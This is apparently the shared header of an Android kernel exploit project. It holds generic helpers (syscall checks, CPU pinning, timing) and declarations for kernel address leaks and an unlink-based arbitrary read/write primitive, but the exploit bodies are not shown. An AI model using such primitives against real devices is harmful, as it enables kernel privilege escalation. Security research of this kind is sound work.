#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <err.h>
#include <stdlib.h>
#include <assert.h>
#include <string.h>
#include <stdint.h>
#include <time.h>
#include <stdbool.h>
#include <signal.h>
#include <sched.h>
#include <sys/uio.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <sys/mman.h>
#include <sys/signalfd.h>
#include <ctype.h>
#include <errno.h>
#include <poll.h>
#include <sys/eventfd.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/resource.h>
#include <sys/utsname.h>
#include <sys/ucontext.h>

// bionic's getpid() uses some stupid cache that doesn't interact properly with
// clone(). sooo...
#undef getpid
#define getpid() ((int)syscall(__NR_getpid))

#define PAGE_OFFSET 0xffffffc000000000UL

/* print error and abort if syscall returned error code */
#define SYSCHK(x) ({                      \
  typeof(x) __res = (x);                  \
  if ((long)__res == -1)                  \
    err(1, "SYSCHK: %s", #x);             \
  __res;                                  \
})

// ensure that when the main process is killed via something like ^C, the entire
// process tree dies relatively quickly
static void set_pdeathsig(void) {
  SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));
  if (getppid() == 1) errx(1, "parent went away immediately");
}

// tell the scheduler to pin a task to a specific CPU core
static void pin_task_to(int pid, int cpu) {
  cpu_set_t cset;
  CPU_ZERO(&cset);
  CPU_SET(cpu, &cset);
  SYSCHK(sched_setaffinity(pid, sizeof(cpu_set_t), &cset));
}
static void pin_to(int cpu) { pin_task_to(0, cpu); }

// get current time in microseconds, with the same clock as dmesg
static uint64_t getmicros(void) {
  struct timespec ts;
  SYSCHK(clock_gettime(CLOCK_MONOTONIC, &ts));
  return ts.tv_sec * (uint64_t)1000000 + ts.tv_nsec / 1000;
}

/* printf into temporary buffer */
#define tprintf(...) ({                        \
  char __buf[1000];                            \
  snprintf(__buf, sizeof(__buf), __VA_ARGS__); \
  __buf;                                       \
})


/* addr_leak.c */

struct shared_page {
  char *user_mapping;
  unsigned long kernel_mapping;
};
struct shared_page allocate_shared_page(void);

struct known_file_pipe {
  int bipipe_fd; /* use this fd for BOTH reading and writing */
  unsigned long file_kaddr;
};
struct known_file_pipe allocate_known_file_pipe(void);


/* arbitrary_rw.c */

struct unlink_pair {
  unsigned long next;
  unsigned long pprev;
};

struct unlink_pair prepare_unlink(void);
void arbitrary_rw_demo(void);
